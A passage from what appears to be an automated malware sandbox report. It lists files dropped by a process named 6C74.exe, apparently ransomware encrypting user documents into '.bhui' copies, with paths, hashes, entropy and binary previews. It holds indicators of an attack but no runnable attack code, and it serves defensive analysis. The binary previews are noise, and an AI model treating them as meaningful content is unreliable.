Preview:	GLTYDyG....eU:....t..+...i..a4..I.U<W....}^u.v.8<.e..,..%&.h...}...'F..o..v..#s.(.xC.5r.G..2...A..k.{z..[........f3.T...b'.........di..2N...qlA..WD.%._L...<.Z.d....z.......y..A.:.=....4.6L......f..n...D.....S$~.NVza..n....D...`...W.0.$ ........-...>H...XD....E....{n......u_Vwr.Pb...VI.............7..d.?......h.........[>.i.......?3...N..M.bxn.E.3."d.}.................,..D....r... N.8..,...D=)2..B.z...0....U..b..........$F.FI%..`...A3....,...n.+x.l...6..\|.5.....p.J.).}V.....>....e...Y.'.u.G..@...}.`^...d..o.7.`R....:%.9..W!.D.Sc..H...D...;.g......4.......N.=[....E....@....2...-.....5.Q..A.........W.m..g$WQ....:.t. .F..)....)._~..!.T(.\|....Y..3.zI...p\|l!o$..U&L..t# ..x.x..g..v. .3.....R.]?<.y(U.p.6......A0%.Z6#{..B.a...^..Y.9]u6.H).%d.ye)M7......A7w...9.I.&0.".\|...6...IG.[..rv.$.(.d...*.gA.I..(+hs0_..).L....N......)..+m........z.)0.....8....x..W...SC.$,.muo...=..3u..d.J.h..........x.]<~.B.C.,\.2.Z......4...u...%-xs.l.D...../

C:\Users\user\Documents\NYMMPCEIMA\GLTYDMDUST.pdf.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8483939021032825
Encrypted:	false
SSDEEP:	24:fvPhN5VXqf5GofhR/8zrxktVFVjNHO7amRuIftmMacSYvoPYJr5jU1gp/Ok7xSWX:3LfX05GChqzV+j/GtmrcSI5jQOF7xPD
MD5:	E77889B26BC5AE7AEBFB66B42EA5E1A1
SHA1:	BFB77B5003130CA5128F6FBF5E5A72B3BFBF5673
SHA-256:	40F21E16BA9D581E1D3F868D2DF7EA8184FE677F4CB176E2988B814B8807CAFB
SHA-512:	7197615BE69DB93B48D61BBDB5DEEB79D11649DD7F105426F0FF61AE2175A563F275DFC9EC1DAEAB8F0E97D2EE07208C35F08F65BCAF7746F5D4F0D280DEC6B7
Malicious:	false
Reputation:	unknown
Preview:	GLTYDyG....eU:....t..+...i..a4..I.U<W....}^u.v.8<.e..,..%&.h...}...'F..o..v..#s.(.xC.5r.G..2...A..k.{z..[........f3.T...b'.........di..2N...qlA..WD.%._L...<.Z.d....z.......y..A.:.=....4.6L......f..n...D.....S$~.NVza..n....D...`...W.0.$ ........-...>H...XD....E....{n......u_Vwr.Pb...VI.............7..d.?......h.........[>.i.......?3...N..M.bxn.E.3."d.}.................,..D....r... N.8..,...D=)2..B.z...0....U..b..........$F.FI%..`...A3....,...n.+x.l...6..\|.5.....p.J.).}V.....>....e...Y.'.u.G..@...}.`^...d..o.7.`R....:%.9..W!.D.Sc..H...D...;.g......4.......N.=[....E....@....2...-.....5.Q..A.........W.m..g$WQ....:.t. .F..)....)._~..!.T(.\|....Y..3.zI...p\|l!o$..U&L..t# ..x.x..g..v. .3.....R.]?<.y(U.p.6......A0%.Z6#{..B.a...^..Y.9]u6.H).%d.ye)M7......A7w...9.I.&0.".\|...6...IG.[..rv.$.(.d...*.gA.I..(+hs0_..).L....N......)..+m........z.)0.....8....x..W...SC.$,.muo...=..3u..d.J.h..........x.]<~.B.C.,\.2.Z......4...u...%-xs.l.D...../

C:\Users\user\Documents\NYMMPCEIMA\HMPPSXQPQV.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8521859599542765
Encrypted:	false
SSDEEP:	24:5Jn3tdGk95aRNZBsqXSX+uPNwKRZk9WSvSysM78r5FWYLvtIOaU5pY2eAOIVOWbD:Ln3tdRSNlwuKONv18nlLtsU5eAXV7D
MD5:	679F80AB75A3EF23D0A86855C1EB44B9
SHA1:	6F8A4E4DC344861D1E39C7D861727185ACA41DEC
SHA-256:	A500AF4B88F37A416FDBAB72412F1221C35AA8BF2BBD39674871F121AAD8366C
SHA-512:	93C1568D0BDA8ABC616757C18F2EAFBAFF920C837C3C7D06DDEAA9C12EE6FE962931C920B2D215C4349FE56BE370E5D708826C48DB518ABC3D7BD17300360015
Malicious:	false
Reputation:	unknown
Preview:	HMPPSJ.. ...s.v.1b..q(W.U"@..T......[....cl<.m.....5..pNn..qh[.u.<......."=..]8U.sn@..v.R[.q...V..O.>n>.:..A}.&.+..x.D.!...X.".m1Z.....w......f..c}l...;J.GM..IG......;..O...\%..2Tbyk[...Q..5.O.b....^K....kw%%...pP3T.bA..<..-..zt+..@C";^.<.....k.0~D,.......X.4.0mw.N<...q.? .J...{^M..-.r...SS..F..+.p+f.....3...Y.....C.u....glS.....l...Ku;Fa.....N.B.."4e.....X..$%..l0...>...V.._.M....h.s..i...@.0[Mq4.p.L.....vn..i...A4.J.(.ut)R...lX)(.H_0.O....?qiz.r...N...."p,`.>..6..&3..p.>...w..$....t..>-.....B,C..ZVi.z.(...W.....a..]/....^..~.q...h.Y ...;L.}f.Du.D...El...7>..>.W.......j..I....1.......p..(.^o..P...F$..9..\.q...;z.E......Ku......FFc......[.-.. ......._...P..i..89........[.]..<8t.%..5.....1V...../2..D.F...R....W...cu:..R(4.@.}.:r....4X.........%V....}....H.G..a.(....}q...eEd..@.f.h.....(ms..@.l.x.0x.z.G....!Qg..VJ.?..f.,...N@.Z...&..H%c'U...]E(.1.~g..q...Q>.[..&....6.ox(.{.z,..Z......}9...";.sV.....f....PC..%)5G.4a.......DD..`_L.....

C:\Users\user\Documents\NYMMPCEIMA\HMPPSXQPQV.png.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8521859599542765
Encrypted:	false
SSDEEP:	24:5Jn3tdGk95aRNZBsqXSX+uPNwKRZk9WSvSysM78r5FWYLvtIOaU5pY2eAOIVOWbD:Ln3tdRSNlwuKONv18nlLtsU5eAXV7D
MD5:	679F80AB75A3EF23D0A86855C1EB44B9
SHA1:	6F8A4E4DC344861D1E39C7D861727185ACA41DEC
SHA-256:	A500AF4B88F37A416FDBAB72412F1221C35AA8BF2BBD39674871F121AAD8366C
SHA-512:	93C1568D0BDA8ABC616757C18F2EAFBAFF920C837C3C7D06DDEAA9C12EE6FE962931C920B2D215C4349FE56BE370E5D708826C48DB518ABC3D7BD17300360015
Malicious:	false
Reputation:	unknown
Preview:	HMPPSJ.. ...s.v.1b..q(W.U"@..T......[....cl<.m.....5..pNn..qh[.u.<......."=..]8U.sn@..v.R[.q...V..O.>n>.:..A}.&.+..x.D.!...X.".m1Z.....w......f..c}l...;J.GM..IG......;..O...\%..2Tbyk[...Q..5.O.b....^K....kw%%...pP3T.bA..<..-..zt+..@C";^.<.....k.0~D,.......X.4.0mw.N<...q.? .J...{^M..-.r...SS..F..+.p+f.....3...Y.....C.u....glS.....l...Ku;Fa.....N.B.."4e.....X..$%..l0...>...V.._.M....h.s..i...@.0[Mq4.p.L.....vn..i...A4.J.(.ut)R...lX)(.H_0.O....?qiz.r...N...."p,`.>..6..&3..p.>...w..$....t..>-.....B,C..ZVi.z.(...W.....a..]/....^..~.q...h.Y ...;L.}f.Du.D...El...7>..>.W.......j..I....1.......p..(.^o..P...F$..9..\.q...;z.E......Ku......FFc......[.-.. ......._...P..i..89........[.]..<8t.%..5.....1V...../2..D.F...R....W...cu:..R(4.@.}.:r....4X.........%V....}....H.G..a.(....}q...eEd..@.f.h.....(ms..@.l.x.0x.z.G....!Qg..VJ.?..f.,...N@.Z...&..H%c'U...]E(.1.~g..q...Q>.[..&....6.ox(.{.z,..Z......}9...";.sV.....f....PC..%)5G.4a.......DD..`_L.....

C:\Users\user\Documents\NYMMPCEIMA\LFOPODGVOH.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.849914050767572
Encrypted:	false
SSDEEP:	24:lRg+Hb+WAPrtNPscF6qBO5Dy18Qu/JxnD25U07k6WbD:1HaWiJNVF3cM6QujD4uD
MD5:	66166B14B80F2DE3DE7C186EDBA59CF2
SHA1:	0A6E5A405FDF3251658533CC18169DC174BC248C
SHA-256:	E5AE47329C13F7FB02A514F5110DA76DF718C781BE9FA3F36E6ED638764DBB9B
SHA-512:	A548320A0E6049046DF879E686C5CAB88207D2D4111F55303513EAE76BAED8B03FC415F95D27E26220AE4722B65F47A8AADB1A8A0F8227001511B86E0E3DDD61
Malicious:	false
Reputation:	unknown
Preview:	LFOPO.......mn..O.>....&.`.gd.f?..<>.z./..Zq.$..p69.H...#\g]eR.....A.W...?.k..g.0M.......cD.v.....M.PM...q..M.D.6..t.HQ7....T.Y....(3k.....^.N"R(uqId.......(.E.0.j"..v.J.....L%.w&...\..Q4....UU.:c!.~.<. Xm.....6.....\|\...."q:N<.}....u.ChQh..{S...2....w.A<:......gz.....Q..P.......O.(........U.t.p.T..:.'O..#x..6..{..y.Lu....(U.]${L..x`)...'....[...Y\|l..HM........o....a{.........~..C7U.....\|.9.FJ.+t.L+....aJ.rxU#T.d..\|....mbi.om.Q..n..=zP-.b.....L.3...$..[F>......ys.{..B.E.N......Q..@.i.t.._.\|.G...O.K...Mp. .S...\...<wv^Z..I>.h^....+u...ON..)..89....X.)a.X.^..sH;.L..>3.].y...-@\.W.......g.....-d>VH.....P.!E..f......Y.fT..........AZ.......kCF...Z.7n\|`I....3......z...hF.Rq....+,..`.T.i..~..mJ8.D.J.2T.?.y.x......#.%..0..e.....{,....z<..Q.;=...8.}[*x U^.....{;.n.sB.Ml.......o....p..]SQ..=.]]..\..?6%?K.R.$~~K.E.....':D.....d...W.K.........q..w....CT\.8....R.`X.....kd\.xe...#K..5D.w.x... .+..[!Ya....{5..O.a.k.KF........\.."u.B.^..z..)<-..w

C:\Users\user\Documents\NYMMPCEIMA\LFOPODGVOH.jpg.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.849914050767572
Encrypted:	false
SSDEEP:	24:lRg+Hb+WAPrtNPscF6qBO5Dy18Qu/JxnD25U07k6WbD:1HaWiJNVF3cM6QujD4uD
MD5:	66166B14B80F2DE3DE7C186EDBA59CF2
SHA1:	0A6E5A405FDF3251658533CC18169DC174BC248C
SHA-256:	E5AE47329C13F7FB02A514F5110DA76DF718C781BE9FA3F36E6ED638764DBB9B
SHA-512:	A548320A0E6049046DF879E686C5CAB88207D2D4111F55303513EAE76BAED8B03FC415F95D27E26220AE4722B65F47A8AADB1A8A0F8227001511B86E0E3DDD61
Malicious:	false
Reputation:	unknown
Preview:	LFOPO.......mn..O.>....&.`.gd.f?..<>.z./..Zq.$..p69.H...#\g]eR.....A.W...?.k..g.0M.......cD.v.....M.PM...q..M.D.6..t.HQ7....T.Y....(3k.....^.N"R(uqId.......(.E.0.j"..v.J.....L%.w&...\..Q4....UU.:c!.~.<. Xm.....6.....\|\...."q:N<.}....u.ChQh..{S...2....w.A<:......gz.....Q..P.......O.(........U.t.p.T..:.'O..#x..6..{..y.Lu....(U.]${L..x`)...'....[...Y\|l..HM........o....a{.........~..C7U.....\|.9.FJ.+t.L+....aJ.rxU#T.d..\|....mbi.om.Q..n..=zP-.b.....L.3...$..[F>......ys.{..B.E.N......Q..@.i.t.._.\|.G...O.K...Mp. .S...\...<wv^Z..I>.h^....+u...ON..)..89....X.)a.X.^..sH;.L..>3.].y...-@\.W.......g.....-d>VH.....P.!E..f......Y.fT..........AZ.......kCF...Z.7n\|`I....3......z...hF.Rq....+,..`.T.i..~..mJ8.D.J.2T.?.y.x......#.%..0..e.....{,....z<..Q.;=...8.}[*x U^.....{;.n.sB.Ml.......o....p..]SQ..=.]]..\..?6%?K.R.$~~K.E.....':D.....d...W.K.........q..w....CT\.8....R.`X.....kd\.xe...#K..5D.w.x... .+..[!Ya....{5..O.a.k.KF........\.."u.B.^..z..)<-..w

C:\Users\user\Documents\NYMMPCEIMA\NWCXBPIUYI.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858586434582161
Encrypted:	false
SSDEEP:	24:zMY9uNHH7n9B8yEEuJZvHGnYxgcAoOmxbf/n3oxDle9Uj1CdL2PRyya/QrAoCEXI:z/0x78SAxecPOmt/n84Gj1CcPhWhoCsI
MD5:	23E3A73E7DC60CFE7647F2039F7D0388
SHA1:	527232DA935006485AD9D542114133FB39D6BA58
SHA-256:	DAAA24D7A8CB50E5E61C3A1FC09D4BE5C4DF579A15391E6FEBDD88BF679D2746
SHA-512:	13BAF6E4280FA4B63263CD141245332508CC1FA5FBBC17B78174CB0D31078B0AA77C3793CB4A07177492C901D407BE411BB7298D6984DBA274597EE2AA191A45
Malicious:	false
Reputation:	unknown
Preview:	NWCXB..!....r~_........).m.9.E...L..&.........d..d.._..c'.......w...a...x\..2....$......y..@......!..u.A.\%\|..u.j.T..H..[ Ln.;C..6)..\.&Mx..acC..<....LO..h..w.Q.P2u..XMr......o.N.46.....z...q.....wP...I...d....)..2..Y..!P....p..#...u2.'.....{.D$.....i.$..a?X;..M+../..MX...p..'....M...'q..'.Y...@.v...%7....n.4..!..sz(aW.0.=.nR...rr.h.....\|P....9-.2D"..{.....].Hjn..+....q. .^.!{.N.!6..g...tA}..$...s...\|...C.=\|...f.I.j..w..TH.:G..OD-..VQm.:.B.N......k....,x..'s..].5....X.y.B.6...X...t........)g.mJ.m.b....E.v...x...\|.wc.t>.J.$.=......?..X.-QIh...:..ao...n;.@.4Y.!..S....^.R......0.d.@..i.....f9X.....#...B.... %.m..S.M.J.M._Ww...p...q.5.6TH...F.$&=.....&;.....H~A...1;\|m....p..\..N.a~.)B.E.Ik.C.o......m..VY..@j`.._.....t..W......\.L)<.5.?..(,...dY...EM.......4~e.iJ...3B.....~Z.....v...8.....<.[.....c...@..(f..]n(L..00.. .q*..].....{._.@.9e........I..F.......UJ.....!.%fr.Bg..../v .....r[5.=....E..8_.?..+......A[Jn..._A.....#..Q66m.

C:\Users\user\Documents\NYMMPCEIMA\NWCXBPIUYI.xlsx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858586434582161
Encrypted:	false
SSDEEP:	24:zMY9uNHH7n9B8yEEuJZvHGnYxgcAoOmxbf/n3oxDle9Uj1CdL2PRyya/QrAoCEXI:z/0x78SAxecPOmt/n84Gj1CcPhWhoCsI
MD5:	23E3A73E7DC60CFE7647F2039F7D0388
SHA1:	527232DA935006485AD9D542114133FB39D6BA58
SHA-256:	DAAA24D7A8CB50E5E61C3A1FC09D4BE5C4DF579A15391E6FEBDD88BF679D2746
SHA-512:	13BAF6E4280FA4B63263CD141245332508CC1FA5FBBC17B78174CB0D31078B0AA77C3793CB4A07177492C901D407BE411BB7298D6984DBA274597EE2AA191A45
Malicious:	false
Reputation:	unknown
Preview:	NWCXB..!....r~_........).m.9.E...L..&.........d..d.._..c'.......w...a...x\..2....$......y..@......!..u.A.\%\|..u.j.T..H..[ Ln.;C..6)..\.&Mx..acC..<....LO..h..w.Q.P2u..XMr......o.N.46.....z...q.....wP...I...d....)..2..Y..!P....p..#...u2.'.....{.D$.....i.$..a?X;..M+../..MX...p..'....M...'q..'.Y...@.v...%7....n.4..!..sz(aW.0.=.nR...rr.h.....\|P....9-.2D"..{.....].Hjn..+....q. .^.!{.N.!6..g...tA}..$...s...\|...C.=\|...f.I.j..w..TH.:G..OD-..VQm.:.B.N......k....,x..'s..].5....X.y.B.6...X...t........)g.mJ.m.b....E.v...x...\|.wc.t>.J.$.=......?..X.-QIh...:..ao...n;.@.4Y.!..S....^.R......0.d.@..i.....f9X.....#...B.... %.m..S.M.J.M._Ww...p...q.5.6TH...F.$&=.....&;.....H~A...1;\|m....p..\..N.a~.)B.E.Ik.C.o......m..VY..@j`.._.....t..W......\.L)<.5.?..(,...dY...EM.......4~e.iJ...3B.....~Z.....v...8.....<.[.....c...@..(f..]n(L..00.. .q*..].....{._.@.9e........I..F.......UJ.....!.%fr.Bg..../v .....r[5.=....E..8_.?..+......A[Jn..._A.....#..Q66m.

C:\Users\user\Documents\NYMMPCEIMA\NYMMPCEIMA.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8298294242824005
Encrypted:	false
SSDEEP:	24:Ul1xyUlNA65TuIHXHRo1zqV1uNG9SKnVkPn6BwFA0waO+oo3Ws4D6edpyzKWbD:u18Uo65TumRoSU43nfBlsOdo3uD6eQD
MD5:	7EAE7ADEE272ECA4C7E5EB6BF1212682
SHA1:	8BC19994D87C477B8121BC4D1A6A3B2829A14452
SHA-256:	B097330F1A2246D3F64F3E0D7DD76169C030A3941FE73829FF0FB8034DC94A43
SHA-512:	B745D7468C57DB1D8CDE74774A5749C0AAE8CE7154D2EC65BE84A1A1A430E61704FB9BF63C3DD2C02106621CDEB21BAAC8118CAAE0729CAE8B8D4EAE632BE1D7
Malicious:	false
Reputation:	unknown
Preview:	NYMMP,.=....V.._..T.B.....]w.x.o...P..2...s.[Lv.TN..b9M.@_.y.&cI.jPYx....&B.... npa..P..'[.i...N.Fak.:."I.......z..i1]&p....3..y.y....A...<.S=..=..;.".&...yX...0`..&.._...@....TX....eBx.!z.....M7.2....}....$wE...eNC..`.?.N2....d.........,I..(...j.....,.x.').C)H.O.e...2.n..N.Q."^@.8..j.kZ.E....i!..y....{.rc.0..s.T..^..5 8/..d........Yr.o?.......c....p1...6....n.w&..D.:._..(t...\|...u.......V.#..#o.....@.Ia..X..).!s.,.(....A.y..M.aay.....8.......c..oc. ...M...r.u.i..Q.e..B...@...\|e...m"..{..X.+<A.........8.....M.8..r..W..~i.;....j..#.6>......c2y=V.$.[....c.]f...t./_..v..E....`.0Np...a.].O#...M.H...6....U..\...m...2.0.Y..S;..2_..M.$tx.Oi7L!......]".8.o....k..f.....T. ....bI.(B.....k.......~.H.V.i.$...........Q...,.]...7t...m.Nw....p....&..%.T....tk.{t.=]t6...TX/Y.YB.5_..4...Eg>..k9N ."...{d........P:.3....G.K..i...).mE...n5.L+..e.0....EV.............m<..a...^."..........Z..'4.....~.Y.gq..T.J.....x..mD.3.....'.&...J.!uBy...m.arK<.

C:\Users\user\Documents\NYMMPCEIMA\NYMMPCEIMA.docx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8298294242824005
Encrypted:	false
SSDEEP:	24:Ul1xyUlNA65TuIHXHRo1zqV1uNG9SKnVkPn6BwFA0waO+oo3Ws4D6edpyzKWbD:u18Uo65TumRoSU43nfBlsOdo3uD6eQD
MD5:	7EAE7ADEE272ECA4C7E5EB6BF1212682
SHA1:	8BC19994D87C477B8121BC4D1A6A3B2829A14452
SHA-256:	B097330F1A2246D3F64F3E0D7DD76169C030A3941FE73829FF0FB8034DC94A43
SHA-512:	B745D7468C57DB1D8CDE74774A5749C0AAE8CE7154D2EC65BE84A1A1A430E61704FB9BF63C3DD2C02106621CDEB21BAAC8118CAAE0729CAE8B8D4EAE632BE1D7
Malicious:	false
Reputation:	unknown
Preview:	NYMMP,.=....V.._..T.B.....]w.x.o...P..2...s.[Lv.TN..b9M.@_.y.&cI.jPYx....&B.... npa..P..'[.i...N.Fak.:."I.......z..i1]&p....3..y.y....A...<.S=..=..;.".&...yX...0`..&.._...@....TX....eBx.!z.....M7.2....}....$wE...eNC..`.?.N2....d.........,I..(...j.....,.x.').C)H.O.e...2.n..N.Q."^@.8..j.kZ.E....i!..y....{.rc.0..s.T..^..5 8/..d........Yr.o?.......c....p1...6....n.w&..D.:._..(t...\|...u.......V.#..#o.....@.Ia..X..).!s.,.(....A.y..M.aay.....8.......c..oc. ...M...r.u.i..Q.e..B...@...\|e...m"..{..X.+<A.........8.....M.8..r..W..~i.;....j..#.6>......c2y=V.$.[....c.]f...t./_..v..E....`.0Np...a.].O#...M.H...6....U..\...m...2.0.Y..S;..2_..M.$tx.Oi7L!......]".8.o....k..f.....T. ....bI.(B.....k.......~.H.V.i.$...........Q...,.]...7t...m.Nw....p....&..%.T....tk.{t.=]t6...TX/Y.YB.5_..4...Eg>..k9N ."...{d........P:.3....G.K..i...).mE...n5.L+..e.0....EV.............m<..a...^."..........Z..'4.....~.Y.gq..T.J.....x..mD.3.....'.&...J.!uBy...m.arK<.

C:\Users\user\Documents\NYMMPCEIMA\VWDFPKGDUF.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856225654144632
Encrypted:	false
SSDEEP:	24:Ta8Ns2S66kLBIMoyGVK2cRp3i5u7HRRbj3gV/HY+tUD7y4QRACzWbD:Jl5TBIzVncRpVHRRbj3g1Y+tOQRACwD
MD5:	97A116B3BA06B34A6036FB0A2D54E674
SHA1:	D6C2D320EF0F1EC637B0C99863F6E3C3A61D233B
SHA-256:	B1459ED02BB11D756514339C276A253EBA3ABA5D991A07A7CB695F7E4DD5D57E
SHA-512:	960FC69268A1B56039EBADFC1CB5F1C2C90418A755B777749FCABEB15254468F56CA8E387CC19301D3CADB68B128FB7F2A36670F8E32927EFE220CD18FF0CF21
Malicious:	false
Reputation:	unknown
Preview:	VWDFP.z...^<..X'..5w.e.....X....W...k...._....'.B?.X.Q_.w...Nw.U./Vf;l...h.\...w..c.o.'.\|q.S..!.P....N...[.....f$..e.i..-......2.cH.`...T.2:t...#R.Gd..#.[..l..H.!...G../.......Q .m.r.g....B.9...Z..@.4..;.kU.ua.....KN.......@...^7.U...x]/7Q......A..X..o....[.~.y8.../l...6-....D..$.{..jAjQ..h..T.n..l.@..h..h.q./......W...2.5v .8T..i].\|r...I.....P.n\...2x......Q.TE...%..z..p..[6...F.X..t.....[ .....r....pm.mK...'.bq"..._.8.....J..1b\L.OJ..Q..x.....7-.....>(7.....;.R.p...#.R7........~eE...o3.r..6..=.]#.r....N.1@.#p..%.A.b...Z.."e.<6...T.:...1..4....R}:3..4t..F.."...-.x.i...~...<.x%. ..5.;...Q.Q_.....I7.......0...%E...c:..\.}.......j...o....:..%S...R.g;.[.mK-8n.9...cO..Q[..M.RN..n...I_."1..t...POx.b.H?.1..4@Z.._0...Y..lQ.....2\|..s..<......Buf.4x./.".22.D.,.p ..U.[.\|.P...}."}d!..U.......8......."..9y..p..xOo...x....FD*g.....D....,]~.x....Fk.....)).k....8...._...."..~.'.{.<!...n..Wd......]...r...L...l.....h/.y.h........ 8. .4.k...T.

C:\Users\user\Documents\NYMMPCEIMA\VWDFPKGDUF.mp3.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856225654144632
Encrypted:	false
SSDEEP:	24:Ta8Ns2S66kLBIMoyGVK2cRp3i5u7HRRbj3gV/HY+tUD7y4QRACzWbD:Jl5TBIzVncRpVHRRbj3g1Y+tOQRACwD
MD5:	97A116B3BA06B34A6036FB0A2D54E674
SHA1:	D6C2D320EF0F1EC637B0C99863F6E3C3A61D233B
SHA-256:	B1459ED02BB11D756514339C276A253EBA3ABA5D991A07A7CB695F7E4DD5D57E
SHA-512:	960FC69268A1B56039EBADFC1CB5F1C2C90418A755B777749FCABEB15254468F56CA8E387CC19301D3CADB68B128FB7F2A36670F8E32927EFE220CD18FF0CF21
Malicious:	false
Reputation:	unknown
Preview:	VWDFP.z...^<..X'..5w.e.....X....W...k...._....'.B?.X.Q_.w...Nw.U./Vf;l...h.\...w..c.o.'.\|q.S..!.P....N...[.....f$..e.i..-......2.cH.`...T.2:t...#R.Gd..#.[..l..H.!...G../.......Q .m.r.g....B.9...Z..@.4..;.kU.ua.....KN.......@...^7.U...x]/7Q......A..X..o....[.~.y8.../l...6-....D..$.{..jAjQ..h..T.n..l.@..h..h.q./......W...2.5v .8T..i].\|r...I.....P.n\...2x......Q.TE...%..z..p..[6...F.X..t.....[ .....r....pm.mK...'.bq"..._.8.....J..1b\L.OJ..Q..x.....7-.....>(7.....;.R.p...#.R7........~eE...o3.r..6..=.]#.r....N.1@.#p..%.A.b...Z.."e.<6...T.:...1..4....R}:3..4t..F.."...-.x.i...~...<.x%. ..5.;...Q.Q_.....I7.......0...%E...c:..\.}.......j...o....:..%S...R.g;.[.mK-8n.9...cO..Q[..M.RN..n...I_."1..t...POx.b.H?.1..4@Z.._0...Y..lQ.....2\|..s..<......Buf.4x./.".22.D.,.p ..U.[.\|.P...}."}d!..U.......8......."..9y..p..xOo...x....FD*g.....D....,]~.x....Fk.....)).k....8...._...."..~.'.{.<!...n..Wd......]...r...L...l.....h/.y.h........ 8. .4.k...T.

C:\Users\user\Documents\Outlook Files\Outlook.pst

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	Microsoft Outlook email folder
Category:	dropped
Size (bytes):	271694
Entropy (8bit):	5.49923376349688
Encrypted:	false
SSDEEP:	3072:Jo1yjmF9MBMfhgM5pWQkec1m87Ez3UvXFxqsTEzMHmltf3gXq:Jen9Mmpg4co8Az3U/7ZTilVwXq
MD5:	FE998EA7DA322DCBA0235D0BC67E8762
SHA1:	514BB91EEFD47CFE3BB7ECEF93409ABD35BA12FA
SHA-256:	9BB9DC01B19F14AC89D00CF39E6FC835756B5C19CAA40136A051E14FE584B85E
SHA-512:	37A9AC33207E8F5DCEFF5B8A3D1AD8452922C702837C157A6B160FC435E7498C2E071378563F05DF7190298DB0957722C8FA9A84F4B8F1FF59B0FCF535E6863E
Malicious:	false
Reputation:	unknown
Preview:	!BDN..;....e)u..k....%.3..P.g6.%@]............}..YI.k..4}..n..Zr..o...t..3...o.."5..1.....n\8~.!..... ..hb.-vb...).......zQ.Q.bW..#.....Z....u..q....O.#&........g.K..W#.8..&z.....#..G...T.j....li<......R..$.+.1.]...=.#.'.8..".0[k..E.g7.n...f\...8./.G....Ni.x(.eGP.L"?...R...d6..~.T..:0j..(........l....+S{C....{.@"..:}........qY.%....*..d.F.............v.&..)L...H-L+......)....$B~..C..$T..a.3.h...:...SN:`..:.O.R..}Z..:.f.O.;-8.+.&Z........'.=.".{...l..>.G9....Z. ..j"...M...E.A,.!7..:.'].7<...F..D.....<gW..l..Kn.da...`0.N.v.hY.. b.y.......N.Q...^.P..;...H...x....s....Khr.4....^.0`...j%.;6.cK?....}2..X..s..1.yD...\,y]J...I...rS.+'.xu...x.4.n.o..1zU.j...\V.....p."M.I'.k..e..T...N.k.....EM...d.E!q..O@...x....]...%l8.:..um....l..-..rc.p.=....=....J...M......WW;p[x.......r.D#C..gs.u..]...?.....=.b..i.=.8.L.v2 K..A..}.3..C.`...R...p..$s7#..:......+..g...([A._~2_(9......~$o.L....Xi.&..}..O.Q...K.R..FE.9..r...5.............x...p..){....

C:\Users\user\Documents\Outlook Files\Outlook.pst.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	Microsoft Outlook email folder
Category:	dropped
Size (bytes):	271694
Entropy (8bit):	5.49923376349688
Encrypted:	false
SSDEEP:	3072:Jo1yjmF9MBMfhgM5pWQkec1m87Ez3UvXFxqsTEzMHmltf3gXq:Jen9Mmpg4co8Az3U/7ZTilVwXq
MD5:	FE998EA7DA322DCBA0235D0BC67E8762
SHA1:	514BB91EEFD47CFE3BB7ECEF93409ABD35BA12FA
SHA-256:	9BB9DC01B19F14AC89D00CF39E6FC835756B5C19CAA40136A051E14FE584B85E
SHA-512:	37A9AC33207E8F5DCEFF5B8A3D1AD8452922C702837C157A6B160FC435E7498C2E071378563F05DF7190298DB0957722C8FA9A84F4B8F1FF59B0FCF535E6863E
Malicious:	false
Reputation:	unknown
Preview:	!BDN..;....e)u..k....%.3..P.g6.%@]............}..YI.k..4}..n..Zr..o...t..3...o.."5..1.....n\8~.!..... ..hb.-vb...).......zQ.Q.bW..#.....Z....u..q....O.#&........g.K..W#.8..&z.....#..G...T.j....li<......R..$.+.1.]...=.#.'.8..".0[k..E.g7.n...f\...8./.G....Ni.x(.eGP.L"?...R...d6..~.T..:0j..(........l....+S{C....{.@"..:}........qY.%....*..d.F.............v.&..)L...H-L+......)....$B~..C..$T..a.3.h...:...SN:`..:.O.R..}Z..:.f.O.;-8.+.&Z........'.=.".{...l..>.G9....Z. ..j"...M...E.A,.!7..:.'].7<...F..D.....<gW..l..Kn.da...`0.N.v.hY.. b.y.......N.Q...^.P..;...H...x....s....Khr.4....^.0`...j%.;6.cK?....}2..X..s..1.yD...\,y]J...I...rS.+'.xu...x.4.n.o..1zU.j...\V.....p."M.I'.k..e..T...N.k.....EM...d.E!q..O@...x....]...%l8.:..um....l..-..rc.p.=....=....J...M......WW;p[x.......r.D#C..gs.u..]...?.....=.b..i.=.8.L.v2 K..A..}.3..C.`...R...p..$s7#..:......+..g...([A._~2_(9......~$o.L....Xi.&..}..O.Q...K.R..FE.9..r...5.............x...p..){....

C:\Users\user\Documents\QCOILOQIKC.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.824094356157092
Encrypted:	false
SSDEEP:	24:sE8yp/L/uo+ybNQwuMB+5mtHb31vjp/S9tZaZS81Hlspu3VIfES9NWVlOWbD:T/XtbNruMWmtHzJj2asM3K5ql7D
MD5:	4CB7010227BB6E861BE5BA7AF8EAC8AB
